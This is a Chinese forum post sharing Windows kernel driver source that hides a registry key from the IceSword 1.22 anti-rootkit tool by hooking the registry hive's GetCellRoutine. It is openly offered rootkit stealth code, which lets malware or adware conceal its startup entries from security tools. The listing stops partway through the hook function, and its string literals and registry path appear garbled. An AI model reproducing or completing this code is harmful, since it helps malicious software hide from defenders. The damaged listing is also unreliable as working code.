过icesword 1.22 ，注册表隐藏，启动项隐藏


		发一段隐藏注册表项的驱动代码，可以过目前最新的IceSword1.22。
以前驱动开发网悬赏挑战IceSword时写的，不过最后没公开。那时流氓软件势头正劲，我可不想火上浇油。现在反流氓软件日渐成熟，也就没关系了。知道了原理，防御是非常容易的。
原理很简单，实现的代码也很短，啥都不用说，各位直接看示例代码吧。
#include <ntddk.h>
#define GET_PTR(ptr, offset) ( *(PVOID*)( (ULONG)ptr + (offset##Offset) ) )
#define CM_KEY_INDEX_ROOT      0x6972         // ir
#define CM_KEY_INDEX_LEAF      0x696c         // il
#define CM_KEY_FAST_LEAF       0x666c         // fl
#define CM_KEY_HASH_LEAF       0x686c         // hl
// 一些CM的数据结构，只列出用到的开头部分
#pragma pack(1)
typedef struct _CM_KEY_NODE {
       USHORT Signature;
       USHORT Flags;
       LARGE_INTEGER LastWriteTime;
       ULONG Spare;               // used to be TitleIndex
       HANDLE Parent;
       ULONG SubKeyCounts[2];     // Stable and Volatile
       HANDLE SubKeyLists[2];     // Stable and Volatile
       // ...
} CM_KEY_NODE, *PCM_KEY_NODE;
typedef struct _CM_KEY_INDEX {
       USHORT Signature;
       USHORT Count;
       HANDLE List[1];
} CM_KEY_INDEX, *PCM_KEY_INDEX;
typedef struct _CM_KEY_BODY {
       ULONG Type;                // "ky02"
       PVOID KeyControlBlock;
       PVOID NotifyBlock;
       PEPROCESS Process;         // the owner process
       LIST_ENTRY KeyBodyList; // key_nodes using the same kcb
} CM_KEY_BODY, *PCM_KEY_BODY;
typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);
typedef struct _HHIVE {
       ULONG Signature;
       PGET_CELL_ROUTINE GetCellRoutine;
       // ...
} HHIVE, *PHHIVE;
#pragma pack()
// 需隐藏的主键名
WCHAR g_HideKeyName[] = L"\Registry\Machine\SYSTEM\CurrentControlSet\Services\Beep";
PGET_CELL_ROUTINE g_pGetCellRoutine = NULL;
PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL;
PCM_KEY_NODE g_HideNode = NULL;
PCM_KEY_NODE g_LastNode = NULL;
// 打开指定名字的Key
HANDLE OpenKeyByName(PCWSTR pwcsKeyName)
{
       NTSTATUS status;
       UNICODE_STRING uKeyName;
       OBJECT_ATTRIBUTES oa;
       HANDLE hKey;
       RtlInitUnicodeString(&uKeyName, pwcsKeyName);
       InitializeObjectAttributes(&oa, &uKeyName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
       status = ZwOpenKey(&hKey, KEY_READ, &oa);
       if (!NT_SUCCESS(status))
       {
           DbgPrint("ZwOpenKey Failed: %lx
", status);
           return NULL;
       }
       return hKey;
}
// 获取指定Key句柄的KeyControlBlock
PVOID GetKeyControlBlock(HANDLE hKey)
{
       NTSTATUS status;
       PCM_KEY_BODY KeyBody;
       PVOID KCB;
       if (hKey == NULL) return NULL;
       // 由Key句柄获取对象体
       status = ObReferenceObjectByHandle(hKey, KEY_READ, NULL, KernelMode, &KeyBody, NULL);
       if (!NT_SUCCESS(status))
       {
           DbgPrint("ObReferenceObjectByHandle Failed: %lx
", status);
           return NULL;
       }
       // 对象体中含有KeyControlBlock
       KCB = KeyBody->KeyControlBlock;
       DbgPrint("KeyControlBlock = %lx
", KCB);
       ObDereferenceObject(KeyBody);
       return KCB;
}
// 获取父键的最后一个子键的节点
PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node)
{
       // 获取父键的节点
       PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent);
       // 获取子键的索引
       PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]);
       DbgPrint("ParentNode = %lx
Index = %lx
", ParentNode, Index);
       // 如果为根(二级)索引，获取最后一个索引
       if (Index->Signature == CM_KEY_INDEX_ROOT)
       {
           Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
           DbgPrint("Index = %lx
", Index);
       }
       if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF)
       {
           // 快速叶索引(2k)或散列叶索引(XP/2k3)，返回最后的节点
           return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]);
       }
       else
       {
           // 一般叶索引，返回最后的节点
           return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
       }
}
// GetCell例程的钩子函数
PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell)
{
       // 调用原函数
       PVOID pRet = g_pGetCellRoutine(Hive, Cell);
       if (pRet)
       {
           // 返回的是需要隐藏的节点
           if (pRet == g_HideNode)
           {<

补充：综合编程 , 安全编程 ,